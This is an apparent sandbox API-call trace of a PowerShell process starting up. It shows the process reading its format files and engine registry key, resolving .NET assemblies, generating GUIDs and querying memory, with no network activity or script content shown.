	[0291.722] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad040 | out: lpFileInformation=0x1ad040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0291.723] SetErrorMode (uMode=0x1) returned 0x1
	[0291.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0291.723] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad128 | out: phkResult=0x1ad128*=0x300) returned 0x0
	[0291.723] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0ac, lpData=0x0, lpcbData=0x1ad0a8*=0x0 | out: lpType=0x1ad0ac*=0x1, lpData=0x0, lpcbData=0x1ad0a8*=0x56) returned 0x0
	[0291.723] CoTaskMemAlloc (cb=0x5a) returned 0x3d86e0
	[0291.723] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad07c, lpData=0x3d86e0, lpcbData=0x1ad078*=0x56 | out: lpType=0x1ad07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad078*=0x56) returned 0x0
	[0291.723] CoTaskMemFree (pv=0x3d86e0) 
	[0291.723] RegCloseKey (hKey=0x300) returned 0x0
	[0291.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0291.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0291.725] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xa24d5b5d, Data2=0x1837, Data3=0x4d53, Data4=([0]=0x8f, [1]=0x44, [2]=0xf0, [3]=0x15, [4]=0x72, [5]=0xf9, [6]=0xc8, [7]=0x4b))) returned 0x0
	[0291.730] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xdbe9d0e5, Data2=0x27a8, Data3=0x4821, Data4=([0]=0x91, [1]=0xbc, [2]=0xd9, [3]=0xb, [4]=0x93, [5]=0xdb, [6]=0x93, [7]=0x3c))) returned 0x0
	[0291.731] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x2984c414, Data2=0x2bdd, Data3=0x4f31, Data4=([0]=0x84, [1]=0x4, [2]=0x1d, [3]=0x59, [4]=0xc9, [5]=0x99, [6]=0xbf, [7]=0x9e))) returned 0x0
	[0291.732] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xbb4fb6ec, Data2=0x6908, Data3=0x47fb, Data4=([0]=0x9c, [1]=0x68, [2]=0xa1, [3]=0xc0, [4]=0xc7, [5]=0x9e, [6]=0x58, [7]=0xa1))) returned 0x0
	[0291.732] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xa5e0273b, Data2=0x1845, Data3=0x4e6d, Data4=([0]=0xbe, [1]=0xb, [2]=0x0, [3]=0xb1, [4]=0xa5, [5]=0xfa, [6]=0xdf, [7]=0x72))) returned 0x0
	[0291.733] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xf898f073, Data2=0xac81, Data3=0x425e, Data4=([0]=0x90, [1]=0x5c, [2]=0x27, [3]=0xf3, [4]=0xe9, [5]=0xed, [6]=0x27, [7]=0x35))) returned 0x0
	[0291.733] SetErrorMode (uMode=0x1) returned 0x1
	[0291.733] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0291.733] GetFileType (hFile=0x300) returned 0x1
	[0291.733] SetErrorMode (uMode=0x1) returned 0x1
	[0291.733] GetFileType (hFile=0x300) returned 0x1
	[0291.733] ReadFile (in: hFile=0x300, lpBuffer=0x33b3b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33b3b80*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.735] ReadFile (in: hFile=0x300, lpBuffer=0x33b3b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33b3b80*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.735] ReadFile (in: hFile=0x300, lpBuffer=0x33b3b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33b3b80*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.735] ReadFile (in: hFile=0x300, lpBuffer=0x33b3b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33b3b80*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.736] ReadFile (in: hFile=0x300, lpBuffer=0x33b3b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33b3b80*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.736] ReadFile (in: hFile=0x300, lpBuffer=0x33b3b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33b3b80*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0291.736] ReadFile (in: hFile=0x300, lpBuffer=0x33b3b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33b3b80*, lpNumberOfBytesRead=0x1ad098*=0xaca, lpOverlapped=0x0) returned 1
	[0291.737] ReadFile (in: hFile=0x300, lpBuffer=0x33b31b2, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33b31b2*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0291.737] ReadFile (in: hFile=0x300, lpBuffer=0x33b3b80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x33b3b80*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0291.737] CloseHandle (hObject=0x300) returned 1
	[0291.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0291.737] SetErrorMode (uMode=0x1) returned 0x1
	[0291.737] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad040 | out: lpFileInformation=0x1ad040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0291.737] SetErrorMode (uMode=0x1) returned 0x1
	[0291.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0291.738] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad128 | out: phkResult=0x1ad128*=0x300) returned 0x0
	[0291.738] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0ac, lpData=0x0, lpcbData=0x1ad0a8*=0x0 | out: lpType=0x1ad0ac*=0x1, lpData=0x0, lpcbData=0x1ad0a8*=0x56) returned 0x0
	[0291.738] CoTaskMemAlloc (cb=0x5a) returned 0x3d86e0
	[0291.738] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad07c, lpData=0x3d86e0, lpcbData=0x1ad078*=0x56 | out: lpType=0x1ad07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad078*=0x56) returned 0x0
	[0291.738] CoTaskMemFree (pv=0x3d86e0) 
	[0291.738] RegCloseKey (hKey=0x300) returned 0x0
	[0291.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0291.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0292.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1ac5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0292.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ac5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0292.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1ac5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0293.447] VirtualQuery (in: lpAddress=0x1abbc0, lpBuffer=0x1aca80, dwLength=0x30 | out: lpBuffer=0x1aca80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.447] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xc6ac5717, Data2=0x3e91, Data3=0x4470, Data4=([0]=0x92, [1]=0xd1, [2]=0xab, [3]=0x20, [4]=0x82, [5]=0x66, [6]=0xd2, [7]=0xb2))) returned 0x0
	[0293.448] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x38241258, Data2=0x823a, Data3=0x4c5f, Data4=([0]=0x93, [1]=0x89, [2]=0x4c, [3]=0x10, [4]=0x3f, [5]=0x1a, [6]=0x8b, [7]=0x29))) returned 0x0
	[0293.448] VirtualQuery (in: lpAddress=0x1abd70, lpBuffer=0x1acc30, dwLength=0x30 | out: lpBuffer=0x1acc30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.448] VirtualQuery (in: lpAddress=0x1abd70, lpBuffer=0x1acc30, dwLength=0x30 | out: lpBuffer=0x1acc30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.448] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x68bae692, Data2=0xd2ba, Data3=0x4c24, Data4=([0]=0xa6, [1]=0x56, [2]=0xf6, [3]=0x68, [4]=0xf9, [5]=0x7, [6]=0x5e, [7]=0x63))) returned 0x0
	[0293.449] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x44c3f7a9, Data2=0x63d9, Data3=0x4ba2, Data4=([0]=0x8f, [1]=0x1e, [2]=0x68, [3]=0x2b, [4]=0x1, [5]=0x78, [6]=0x19, [7]=0x9e))) returned 0x0
	[0293.449] VirtualQuery (in: lpAddress=0x1abfc0, lpBuffer=0x1ace80, dwLength=0x30 | out: lpBuffer=0x1ace80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.449] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.449] VirtualQuery (in: lpAddress=0x1abd00, lpBuffer=0x1acbc0, dwLength=0x30 | out: lpBuffer=0x1acbc0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0293.449] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x9b2130f5, Data2=0x4a2d, Data3=0x4667, Data4=([0]=0xb0, [1]=0xef, [2]=0xfe, [3]=0xcc, [4]=0xa9, [5]=0x79, [6]=0xf1, [7]=0x19))) returned 0x0
	[0294.214] VirtualQuery (in: lpAddress=0x1abfc0, lpBuffer=0x1ace80, dwLength=0x30 | out: lpBuffer=0x1ace80*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.214] VirtualQuery (in: lpAddress=0x1abde0, lpBuffer=0x1acca0, dwLength=0x30 | out: lpBuffer=0x1acca0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.214] VirtualQuery (in: lpAddress=0x1ab630, lpBuffer=0x1ac4f0, dwLength=0x30 | out: lpBuffer=0x1ac4f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.214] VirtualQuery (in: lpAddress=0x1ab630, lpBuffer=0x1ac4f0, dwLength=0x30 | out: lpBuffer=0x1ac4f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0294.214] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xe4ad7015, Data2=0x1e2a, Data3=0x4a26, Data4=([0]=0xb7, [1]=0x5d, [2]=0xcf, [3]=0xbf, [4]=0xfd, [5]=0xd, [6]=0xf0, [7]=0xe2))) returned 0x0
	[0294.214] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x720eb906, Data2=0xa55b, Data3=0x49a8, Data4=([0]=0xa1, [1]=0xee, [2]=0x9e, [3]=0xe6, [4]=0x58, [5]=0xe9, [6]=0x87, [7]=0xa9))) returned 0x0
	[0294.215] SetErrorMode (uMode=0x1) returned 0x1
	[0294.215] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0294.215] GetFileType (hFile=0x300) returned 0x1
	[0294.215] SetErrorMode (uMode=0x1) returned 0x1
	[0294.215] GetFileType (hFile=0x300) returned 0x1
	[0294.215] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.216] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.217] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.217] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.218] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.218] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.218] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.218] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.219] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.219] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.219] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.220] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.220] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.220] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.220] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.221] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.222] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.222] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0xbce, lpOverlapped=0x0) returned 1
	[0294.222] ReadFile (in: hFile=0x300, lpBuffer=0x34658ae, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x34658ae*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0294.222] ReadFile (in: hFile=0x300, lpBuffer=0x3466178, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x3466178*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0294.223] SetErrorMode (uMode=0x1) returned 0x1
	[0294.223] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad040 | out: lpFileInformation=0x1ad040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0294.223] SetErrorMode (uMode=0x1) returned 0x1
	[0294.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0294.223] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad128 | out: phkResult=0x1ad128*=0x300) returned 0x0
	[0294.224] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0ac, lpData=0x0, lpcbData=0x1ad0a8*=0x0 | out: lpType=0x1ad0ac*=0x1, lpData=0x0, lpcbData=0x1ad0a8*=0x56) returned 0x0
	[0294.224] CoTaskMemAlloc (cb=0x5a) returned 0x3d88a0
	[0294.224] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad07c, lpData=0x3d88a0, lpcbData=0x1ad078*=0x56 | out: lpType=0x1ad07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad078*=0x56) returned 0x0
	[0294.224] CoTaskMemFree (pv=0x3d88a0) 
	[0294.224] RegCloseKey (hKey=0x300) returned 0x0
	[0294.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0294.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0294.234] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x67d18a83, Data2=0x668d, Data3=0x4589, Data4=([0]=0xba, [1]=0xa0, [2]=0x33, [3]=0x72, [4]=0xb3, [5]=0x93, [6]=0xbb, [7]=0xb6))) returned 0x0
	[0294.235] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x38648e5d, Data2=0xfa59, Data3=0x49cd, Data4=([0]=0xa1, [1]=0xab, [2]=0x29, [3]=0xe3, [4]=0x20, [5]=0xea, [6]=0x71, [7]=0x4a))) returned 0x0
	[0294.235] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xc5c153e1, Data2=0xb21e, Data3=0x4316, Data4=([0]=0x9a, [1]=0x17, [2]=0x70, [3]=0x91, [4]=0x44, [5]=0xf9, [6]=0x40, [7]=0x50))) returned 0x0
	[0294.235] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x48299ef4, Data2=0x8e89, Data3=0x4e73, Data4=([0]=0xb2, [1]=0xce, [2]=0xa8, [3]=0x24, [4]=0x9, [5]=0xbc, [6]=0x6f, [7]=0xf4))) returned 0x0
	[0294.235] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x7f413ae5, Data2=0x7698, Data3=0x46d5, Data4=([0]=0x9d, [1]=0xdf, [2]=0x2f, [3]=0x14, [4]=0xba, [5]=0x77, [6]=0x3, [7]=0x86))) returned 0x0
	[0294.235] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xb1131609, Data2=0x66ef, Data3=0x4af8, Data4=([0]=0x98, [1]=0x51, [2]=0xfc, [3]=0x6d, [4]=0x2a, [5]=0x29, [6]=0x46, [7]=0x9a))) returned 0x0
